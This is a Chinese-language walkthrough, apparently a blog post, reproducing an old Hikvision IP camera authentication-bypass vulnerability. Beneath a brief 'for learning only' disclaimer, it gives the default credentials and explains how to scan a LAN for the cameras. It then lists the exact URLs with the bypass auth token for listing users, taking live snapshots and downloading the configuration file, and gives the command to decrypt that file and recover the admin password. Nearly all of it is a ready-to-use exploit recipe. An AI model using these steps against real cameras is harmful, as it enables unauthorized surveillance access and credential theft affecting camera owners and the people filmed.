此漏洞复现仅供学习使用,请勿用于不法用途!!!
0x00 开始之前
可以先尝试使用出厂用户名密码登录
user:admin
pwd:12345
0x10 搜索摄像头后台
先搜索摄像头后台,如果在同一个局域网内可以通过扫描局域网IP的方式搜索。
我使用的是Advanced IP Scanner,扫描之后保存到csv文件中,搜索“Hikvision”可以发现许多IP。
0x20 挑选合适的版本
毕竟这个漏洞已经很古老了,所以只有旧版固件才能用,建议多尝试几个IP,找一个旧点的固件。
0x30 验证漏洞
0x31 检索用户列表
在浏览器中输入以下地址来获取。http://{IP}/Security/users?auth=YWRtaW46MTEK
请将
{IP}
替换为摄像头的IP如果浏览器显示内容如下,说明这个摄像头有漏洞
<UserList xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<User xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<id>1</id>
<userName>admin</userName>
<priority>high</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Administrator</userLevel>
</User>
</UserList>
0x32 获取监控快照
在没有身份验证的情况下可以通过访问以下地址获取监控快照。http://{IP}/onvif-http/snapshot?auth=YWRtaW46MTEK
0x33 下载摄像头配置文件
首先访问以下地址下载配置文件。http://{IP}/System/configurationFile?auth=YWRtaW46MTEK
之后浏览器会自动下载一个名为“configurationFile”的文件
0x34 获取密码
下载这个工具
之后使用以下命令解码配置文件
python3 decrypt_configurationFile.py {configurationFile}
请先使用 pip3 install pycryptodome 下载所需包
接下来你会在输出中看到一大堆文字,但是只需要注意上面获取到的用户名后面跟着的字符串,那就是摄像头的密码。